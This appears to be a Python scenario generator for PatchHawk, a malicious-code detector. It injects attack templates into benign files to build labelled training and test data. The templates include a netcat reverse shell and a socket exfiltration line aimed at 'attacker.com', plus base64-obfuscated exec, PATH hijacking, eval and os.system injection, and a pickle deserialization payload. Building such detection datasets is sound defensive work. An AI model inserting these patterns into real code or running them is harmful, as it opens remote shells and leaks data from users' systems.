Patch_Hawk / patchhawk /data /generate_scenarios.py
kanishcr7's picture
Final check:Passed
d6abea2
"""
Scenario generator for PatchHawk.
Track A: Meta synthetic-data-kit CLI (optional, graceful fallback).
Track B: Custom mutation engine that injects attack templates into benign
Python files. Always produces ≥ 50 scenarios.
Output: a single JSON file with fields:
id, type, code_snippet, patch (or null), unit_test_code,
label, source, attack_type
"""
import json
import os
import random
import subprocess
import tempfile
import uuid
from pathlib import Path
# ============================================================
# Attack Templates for Mutation Engine (Track B)
# ============================================================
ATTACK_TEMPLATES = {
"typosquatting": {
"inject": "import pythonn\n\n",
"patch": "",
},
"obfuscated_exec": {
"inject": (
"import base64\n"
"exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n"
),
"patch": "",
},
"env_hijack": {
"inject": (
"import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n"
),
"patch": "",
},
"subprocess_backdoor": {
"inject": (
"import subprocess\n"
"try:\n"
" subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\n"
"except:\n"
" pass\n\n"
),
"patch": "",
},
"eval_hidden": {
"inject": (
"def safe_eval(x):\n"
" return eval(x)\n"
'safe_eval(\'__import__("os").system("echo 1")\')\n\n'
),
"patch": "",
},
"pickle_deserialization": {
"inject": (
"import pickle\n"
"pickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n"
),
"patch": "",
},
"socket_exfil": {
"inject": (
"import socket\n"
"try:\n"
" s = socket.socket()\n"
" s.connect(('attacker.com', 80))\n"
" s.sendall(b'exfiltrated data')\n"
"except:\n"
" pass\n\n"
),
"patch": "",
},
"malicious_import": {
"inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
"patch": "",
},
}
# ============================================================
# Benign file loader
# ============================================================
def load_benign_files(benign_dir: str) -> list:
files_data = []
if not os.path.exists(benign_dir):
return files_data
for filename in sorted(os.listdir(benign_dir)):
if filename.endswith(".py"):
with open(os.path.join(benign_dir, filename)) as fh:
files_data.append({"filename": filename, "code": fh.read()})
return files_data
# ============================================================
# Auto-generated lightweight unit tests
# ============================================================
def auto_generate_unit_test(filename: str, code: str) -> str:
"""Produce a simple assertion that passes against the benign code."""
test = "import code\n"
if "fibonacci" in code:
test += "assert code.fibonacci(5) == 5\n"
elif "factorial" in code:
test += "assert code.factorial(5) == 120\n"
elif "is_prime" in code:
test += "assert code.is_prime(7) == True\n"
elif "gcd" in code:
test += "assert code.gcd(48, 18) == 6\n"
elif "is_palindrome" in code:
test += "assert code.is_palindrome('racecar') == True\n"
elif "celsius_to_fahrenheit" in code:
test += "assert code.celsius_to_fahrenheit(0) == 32\n"
else:
test += "assert True # module loaded successfully\n"
return test
# ============================================================
# Track B – custom mutation engine (always available)
# ============================================================
def generate_track_b_scenarios(benign_files: list, num_samples: int = 55) -> list:
"""Generate proportional scenarios dynamically based on num_samples."""
scenarios = []
tp_count = int(num_samples * 0.45)
fp_count = int(num_samples * 0.27)
fn_count = num_samples - tp_count - fp_count
# ── True Positives (45%) ──────────────────────────────────
for i in range(tp_count):
bf = random.choice(benign_files)
attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
malicious_code = attack_data["inject"] + bf["code"]
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
scenarios.append(
{
"id": f"tp_{uuid.uuid4().hex[:8]}",
"type": "true_positive",
"code_snippet": malicious_code,
"patch": bf["code"],
"unit_test_code": test_code,
"label": "malicious",
"source": "mutation_engine",
"attack_type": attack_name,
}
)
# ── False Positives (15) ─────────────────────────────────
fp_templates = [
(
"fp_eval",
"def safe_calc(expr):\n"
" # Legit eval in controlled env\n"
" return eval(expr, {'__builtins__': {}}, {})\n\n",
),
(
"fp_requests",
"import requests\n"
"# Just checking internet\n"
"try:\n"
" requests.get('https://8.8.8.8', timeout=1)\n"
"except:\n"
" pass\n\n",
),
(
"fp_os_environ",
"import os\n"
"# Setup proxy\n"
"os.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n",
),
(
"fp_base64",
"import base64\n"
"def encode_msg(msg):\n"
" return base64.b64encode(msg.encode())\n\n",
),
(
"fp_subprocess_legit",
"import subprocess\n"
"# Run a safe command for build process\n"
"result = subprocess.run(['echo', 'build ok'], capture_output=True)\n\n",
),
]
for i in range(fp_count):
bf = random.choice(benign_files)
fp_name, fp_code = random.choice(fp_templates)
suspicious_code = fp_code + bf["code"]
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
scenarios.append(
{
"id": f"fp_{uuid.uuid4().hex[:8]}",
"type": "false_positive",
"code_snippet": suspicious_code,
"patch": None,
"unit_test_code": test_code,
"label": "benign",
"source": "mutation_engine",
"attack_type": None,
}
)
# ── Functional / Clean (28%) ──────────────────────────────
for i in range(fn_count):
bf = random.choice(benign_files)
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
scenarios.append(
{
"id": f"fn_{uuid.uuid4().hex[:8]}",
"type": "functional",
"code_snippet": bf["code"],
"patch": None,
"unit_test_code": test_code,
"label": "benign",
"source": "mutation_engine",
"attack_type": None,
}
)
return scenarios
# ============================================================
# Track A – Meta synthetic-data-kit (optional)
# ============================================================
def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10) -> list:
"""
Track A: Use Meta's synthetic-data-kit to generate high-quality
code examples. Falls back gracefully if not installed.
"""
sdk_scenarios: list = []
# Check CLI availability
try:
subprocess.run(
["synthetic-data-kit", "--help"],
capture_output=True,
check=True,
)
except (subprocess.SubprocessError, FileNotFoundError):
print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
return sdk_scenarios
config_path = Path(__file__).parent / "sdk_config.yaml"
if not config_path.exists():
print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
return sdk_scenarios
with tempfile.TemporaryDirectory() as tmpdir:
tmp_path = Path(tmpdir)
workspace = tmp_path / "sdk_workspace"
workspace.mkdir()
try:
benign_dir = Path(__file__).parent / "benign"
if benign_dir.exists():
subprocess.run(
[
"synthetic-data-kit",
"ingest",
str(benign_dir),
"--output",
str(workspace / "ingested"),
],
check=True,
capture_output=True,
)
subprocess.run(
[
"synthetic-data-kit",
"create",
str(workspace / "ingested"),
"--type",
"qa",
"-c",
str(config_path),
"--output",
str(workspace / "created"),
],
check=True,
capture_output=True,
timeout=600,
)
subprocess.run(
[
"synthetic-data-kit",
"curate",
str(workspace / "created"),
"--output",
str(workspace / "curated"),
],
check=True,
capture_output=True,
)
output_json = workspace / "final_sdk.json"
subprocess.run(
[
"synthetic-data-kit",
"save-as",
str(workspace / "curated"),
"--format",
"json",
"--output",
str(output_json),
],
check=True,
capture_output=True,
)
if output_json.exists():
with open(output_json) as fh:
data = json.load(fh)
for item in data:
sdk_scenarios.append(
{
"id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
"type": "true_positive"
if item.get("patch")
else "functional",
"code_snippet": item.get("code_snippet")
or item.get("code"),
"patch": item.get("patch"),
"unit_test_code": item.get(
"unit_test_code", "import code\nassert True"
),
"label": "malicious" if item.get("patch") else "benign",
"source": "synthetic_data_kit",
"attack_type": item.get("attack_type", "llm_generated"),
}
)
except subprocess.TimeoutExpired:
print("⚠️ SDK generation timed out.")
except subprocess.CalledProcessError as e:
msg = e.stderr.decode() if e.stderr else "Unknown error"
print(f"⚠️ SDK command failed: {msg}")
return sdk_scenarios
# ============================================================
# Track HF – Hugging Face dataset loader (optional)
# ============================================================
def generate_track_hf_scenarios(
hf_dataset_id: str,
split: str = "train",
text_field: str = "code",
num_samples: int = 0,
only_python: bool = False,
) -> list:
"""
Load snippets from a Hugging Face dataset and return scenario dicts.
- `hf_dataset_id`: e.g. "username/repo" or a dataset id on the Hub
- `text_field`: field name in dataset containing the code/snippet
- `num_samples`: 0 => load entire split, otherwise limit
"""
hf_scenarios: list = []
try:
from datasets import load_dataset
except Exception as e:
print(f"⚠️ Install `datasets` (pip install datasets). Error: {e}")
return hf_scenarios
try:
# If a local path is provided, prefer local loading:
p = Path(hf_dataset_id)
if p.exists():
# Saved dataset directory created by `save_to_disk`
if p.is_dir():
try:
from datasets import load_from_disk
ds = load_from_disk(str(p))
except Exception:
# Fall back to loading as files inside the dir
ds = load_dataset("json", data_files=str(p / "*.jsonl"))
else:
# Single file: jsonl / json / ndjson or plain text
if p.suffix.lower() in (".jsonl", ".json", ".ndjson"):
ds = load_dataset("json", data_files=str(p))
else:
# Treat as plain text file, one example per line
with open(p, "r", encoding="utf-8") as fh:
lines = [l.rstrip("\n") for l in fh if l.strip()]
# create a dataset from python list
from datasets import Dataset
ds = Dataset.from_dict({"text": lines})
else:
ds = load_dataset(hf_dataset_id, split=split)
except Exception as e:
print(f"⚠️ Could not load HF dataset {hf_dataset_id}: {e}")
return hf_scenarios
# optionally limit
try:
total = len(ds)
except Exception:
total = None
if num_samples and num_samples > 0 and total:
num = min(num_samples, total)
try:
ds = ds.select(range(num))
except Exception:
pass
# iterate over dataset rows
for item in ds:
code = None
unit_test = "import code\nassert True"
if isinstance(item, dict):
# optional language filter
if only_python:
lang = (item.get("lang") or item.get("language") or "").lower()
if lang and lang != "python":
continue
# prefer accepted/chosen field when present (e.g., 'chosen')
for k in ("chosen", text_field, "code", "snippet", "text"):
if k in item and item[k]:
code = item[k]
break
# best-effort unit test / label / patch extraction
unit_test = item.get("unit_test_code", unit_test)
label = item.get("label") or item.get("classification") or "benign"
patch = item.get("patch")
attack_type = item.get("vulnerability") or item.get("attack_type")
else:
# plain examples (no fields)
code = str(item)
label = "benign"
patch = None
attack_type = None
if not code:
continue
hf_scenarios.append(
{
"id": f"hf_{uuid.uuid4().hex[:8]}",
"type": "true_positive" if patch or (isinstance(label, str) and label.lower() in ("malicious", "vuln", "vulnerable")) else "functional",
"code_snippet": code,
"patch": patch,
"unit_test_code": unit_test,
"label": "malicious" if (patch or (isinstance(label, str) and label.lower() in ("malicious", "vuln", "vulnerable"))) else "benign",
"source": "huggingface_dataset",
"attack_type": attack_type,
}
)
return hf_scenarios
# ============================================================
# CLI entry point
# ============================================================
def main():
import argparse
parser = argparse.ArgumentParser(description="Generate scenarios for PatchHawk")
parser.add_argument(
"--benign-dir",
type=str,
default="patchhawk/data/benign/",
)
parser.add_argument(
"--output",
type=str,
default="patchhawk/data/scenarios.json",
)
parser.add_argument(
"--num-samples",
type=int,
default=55,
help="Number of scenarios to generate with Track B (mutation engine).",
)
parser.add_argument(
"--use-sdk",
action="store_true",
help="Use Meta synthetic-data-kit (requires CLI + vLLM)",
)
parser.add_argument(
"--sdk-samples",
type=int,
default=10,
help="Number of SDK samples to generate",
)
parser.add_argument(
"--hf-dataset",
type=str,
default=None,
help="HuggingFace dataset id (e.g., username/repo) to import snippets from",
)
parser.add_argument(
"--hf-split",
type=str,
default="train",
help="Split name to load from the HF dataset",
)
parser.add_argument(
"--hf-field",
type=str,
default="code",
help="Field name in HF dataset that contains the code/snippet",
)
parser.add_argument(
"--hf-samples",
type=int,
default=0,
help="Number of HF samples to use (0 = all)",
)
parser.add_argument(
"--hf-only-python",
action="store_true",
default=False,
help="If set, only include HF examples where language/lang == python",
)
args = parser.parse_args()
benign_files = load_benign_files(args.benign_dir)
if not benign_files:
print(f"No benign files found in {args.benign_dir}. Create some first.")
return
# Track B (always)
scenarios = generate_track_b_scenarios(benign_files, args.num_samples)
# Track A (optional)
if args.use_sdk:
sdk = generate_track_a_scenarios_with_sdk(
os.path.dirname(args.output), args.sdk_samples
)
scenarios.extend(sdk)
if sdk:
print(f"Added {len(sdk)} SDK-generated scenarios.")
# Track HF (optional)
if getattr(args, "hf_dataset", None):
hf = generate_track_hf_scenarios(
args.hf_dataset,
args.hf_split,
args.hf_field,
args.hf_samples,
args.hf_only_python,
)
scenarios.extend(hf)
if hf:
print(f"Added {len(hf)} HuggingFace scenarios.")
random.shuffle(scenarios)
os.makedirs(os.path.dirname(args.output), exist_ok=True)
with open(args.output, "w") as fh:
json.dump(scenarios, fh, indent=2)
tp = len([s for s in scenarios if s["label"] == "malicious"])
bn = len([s for s in scenarios if s["label"] == "benign"])
print(f"✅ Total scenarios: {len(scenarios)}")
print(f" Malicious (TP): {tp}")
print(f" Benign (FP+fn): {bn}")
print(f" Saved to {args.output}")
if __name__ == "__main__":
main()